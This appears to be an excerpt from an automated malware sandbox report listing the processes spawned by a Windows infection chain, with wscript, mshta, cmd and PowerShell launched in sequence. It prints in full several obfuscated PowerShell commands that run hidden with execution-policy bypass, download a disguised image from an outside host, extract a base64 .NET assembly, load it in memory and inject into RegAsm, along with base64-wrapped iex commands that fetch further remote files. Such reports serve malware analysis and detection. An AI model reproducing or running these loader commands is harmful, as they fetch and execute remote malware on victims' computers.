                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.sder/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdfiawvnn24gicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhreqtvhlqrsagicagicagicagicagicagicagicagicagicagicatbwvtqmvyzevgsw5pvelpbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagdkusc3ryaw5nicagicagicagicagicagicagicagicagicagicagihriqm4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagihpdclzdwnrolhvpbnqgicagicagicagicagicagicagicagicagicagicagaktgr1nmd3zhavissw50uhryicagicagicagicagicagicagicagicagicagicagie1uve9xktsnicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicj2uxdrt05jalvjbsigicagicagicagicagicagicagicagicagicagicaglw5btuvzuefjzsagicagicagicagicagicagicagicagicagicagicbnqwcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakmuhpzu03bjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlje5my4xntuvegftchavym96l3dly3jlyxrlzgj1dhrlcnntb290agj1dhrlcnroaw5ncy50suyilcikrw52okfquerbvefcd2vjcmvhdgvkynv0dgvyc21vb3roynv0dgvydghpbi52qlmildasmck7u1rbulqtc0xfzxaomyk7c1rhunqgicagicagicagicagicagicagicagicagicagicagiirfbny6qvbqrefuqvx3zwnyzwf0zwridxr0zxjzbw9vdghidxr0zxj0aglulnzcuyi='+[char]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
